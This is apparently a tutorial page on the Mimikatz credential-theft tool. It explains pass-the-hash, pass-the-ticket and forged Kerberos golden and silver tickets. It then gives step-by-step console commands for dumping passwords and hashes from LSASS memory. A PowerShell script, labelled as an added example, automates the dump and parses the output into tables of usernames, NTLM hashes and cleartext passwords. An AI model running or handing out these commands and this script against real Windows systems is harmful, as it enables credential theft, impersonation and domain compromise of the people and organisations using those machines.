Introduction: What is Mimikatz?
Mimikatz is a powerful and well-known post-exploitation tool written in C, capable of extracting plaintext passwords, hashes, PIN codes and Kerberos tickets from memory. It can also perform pass-the-hash and pass-the-ticket, or build Golden Tickets (detailed explanation below).
Today, however, Mimikatz's primary use is stealing the credentials of users logged in to a targeted Windows machine. It is almost always used for malicious purposes, although it was never built as a hacking tool. In the last couple of years it has been used as a component of ransomware worms (NotPetya and BadRabbit, both in 2017) that spread around the globe.
Mimikatz: “A Small Tool To Play With Windows Security”
Mimikatz is an open-source post-exploitation (credential-stealing) tool that recovers login data both as hashes and in clear text. You can use it against a targeted Windows machine to extract cleartext passwords or password hashes from memory, as well as PINs, Kerberos tickets, etc. It also provides attacks such as pass-the-hash, pass-the-ticket, pass-the-cache and building Golden Kerberos tickets. It comes in two flavors: Windows x86 (32-bit) and x64.
This very effective offensive security tool also includes the modules listed below. Mimikatz v1 was bundled with the Metasploit Framework as a Meterpreter extension (v2 is available there as the "kiwi" extension).
Modules (as listed here):
- net
- misc
- library mimilib
- driver mimidrv
Pass-the-Hash: Windows stores password material as an NTLM hash, and NTLM authentication only needs that hash. Without cracking the password, an attacker can use Mimikatz to start a logon session with the stolen hash and authenticate to the target machine as that user.
Over-Pass-the-Hash (Pass-the-Key): A variant in which the attacker uses the user's Kerberos key (the NTLM/RC4 hash or an AES key, obtained from LSASS memory or dumped from a domain controller) to request a genuine Kerberos TGT, impersonating the victim over Kerberos rather than NTLM.
Pass-the-Ticket: Credential material in a "ticket" construct: a Kerberos ticket extracted from one machine is injected into a logon session on another machine, which then authenticates as that user for as long as the ticket is valid.
Pass-the-Cache: The same idea as pass-the-ticket, except the tickets come from the Kerberos credential caches (ccache files) saved on OS X, Linux and UNIX systems.
Kerberos Silver Ticket: Another pass-the-ticket variant: a forged service ticket (TGS) built from the password hash of the service's own account (usually a machine account). It grants access to that one service on that one host, and since it is never validated by the domain controller it leaves no trace there.
Kerberos Golden Ticket: A forged TGT built from the hash of the KRBTGT account, whose key signs and encrypts every TGT in the domain. The attacker chooses the user and group memberships that go into it (typically Domain Admins), so the ticket is accepted by any machine in the domain and keeps working until the KRBTGT password has been changed twice.
Build requirements:
- mimikatz and mimilib: Visual Studio
- mimikatz driver, mimilove and ddk2003 platform: Windows Driver Kit
- Download from GitHub (options:
- Once built, run the executable as administrator (use the build that matches the target machine's architecture: a 32-bit mimikatz cannot read the LSASS process of a 64-bit Windows).
- Start extracting passwords from memory. The console greets you with its banner:
  .#####.   mimikatz 2.2.0 alpha (x64) #17763 Apr 10 2019 00:55
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( firstname.lastname@example.org )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( email@example.com )
  '#####'        > http://pingcastle.com / http://mysmartlogon.com   ***/
First check that you hold the debug privilege (SeDebugPrivilege), which is needed to open the LSASS process before you can dump any passwords:
mimikatz # privilege::debug
Privilege '20' OK
Then start logging all console output to a file (the output is long and easy to lose otherwise):
mimikatz # log logfilename.log
If that succeeds without errors, dump the credentials of the currently logged-on sessions, including cleartext passwords where the system still caches them:
mimikatz # sekurlsa::logonpasswords
On Windows 8.1 / Server 2012 R2 and later, WDigest caching is off by default, so expect NTLM hashes and Kerberos keys rather than cleartext passwords; with Credential Guard enabled, LSASS no longer holds the secrets at all.
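Putting the three commands together, as an added example that is not part of this page or of mimikatz itself: an elevated PowerShell script that checks for LSA Protection first, runs the commands non-interactively (mimikatz accepts its console commands as arguments and "exit" keeps it from dropping to the prompt), stops early when the debug privilege was not granted, and parses the result into username / domain / NTLM / password records. It assumes mimikatz.exe is in the current directory and parses the standard "* Username / * Domain / * NTLM / * Password" layout of sekurlsa::logonpasswords.

```powershell
# Added example (not the page's or the project's own code). Assumptions:
# mimikatz.exe is in the current directory and this is an elevated shell.
$Mimikatz = Join-Path $PWD 'mimikatz.exe'

# sekurlsa reads LSASS memory. When LSA runs as a protected process
# (RunAsPPL = 1) the handle is refused and the command fails unless the
# mimidrv driver is loaded, so check before making a noisy attempt.
$lsa = Get-ItemProperty 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa' -ErrorAction SilentlyContinue
if ($lsa.RunAsPPL -eq 1) {
    Write-Warning 'LSA Protection (RunAsPPL) is enabled; sekurlsa::logonpasswords will not read LSASS without the driver.'
}

# Same three commands as the interactive session above, passed as arguments.
$output = & $Mimikatz 'privilege::debug' 'log logfilename.log' 'sekurlsa::logonpasswords' 'exit' 2>&1

# privilege::debug prints "Privilege '20' OK" on success; without it
# every sekurlsa command fails, so bail out here.
if (-not ($output -match "Privilege '20' OK")) {
    throw 'SeDebugPrivilege not obtained: run from an elevated shell (or as SYSTEM).'
}

# Each credential provider (msv, wdigest, kerberos, ...) prints a block that
# starts with "* Username :" followed by "* Domain :" and then either
# "* NTLM :" (msv) or "* Password :" (wdigest/kerberos). Build one record
# per block.
$creds   = New-Object System.Collections.Generic.List[object]
$current = $null
foreach ($line in $output) {
    if ($line -match '^\s*\*\s*Username\s*:\s*(.+?)\s*$') {
        $current = [pscustomobject]@{ Username = $Matches[1]; Domain = ''; NTLM = ''; Password = '' }
        $creds.Add($current)
    }
    elseif ($current -and $line -match '^\s*\*\s*Domain\s*:\s*(.+?)\s*$')     { $current.Domain   = $Matches[1] }
    elseif ($current -and $line -match '^\s*\*\s*NTLM\s*:\s*([0-9a-f]{32})')   { $current.NTLM     = $Matches[1] }
    elseif ($current -and $line -match '^\s*\*\s*Password\s*:\s*(.+?)\s*$')   { $current.Password = $Matches[1] }
}

# Keep only records that carry a usable secret: mimikatz prints "(null)"
# for providers that hold nothing for that session.
$creds |
    Where-Object { $_.NTLM -or ($_.Password -and $_.Password -ne '(null)') } |
    Sort-Object Domain, Username, NTLM -Unique |
    Format-Table -AutoSize
```

The same log file the page's `log` command produces is written next to the executable, so the parsed table and the raw log can be compared afterwards. Note that the whole run is exactly what endpoint products key on (an unsigned binary opening LSASS with PROCESS_VM_READ right after enabling SeDebugPrivilege), so on a monitored host expect it to be blocked or at least to raise an alert.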
For more information, usage examples and detailed explanations, see the Mimikatz documentation (the project wiki on GitHub).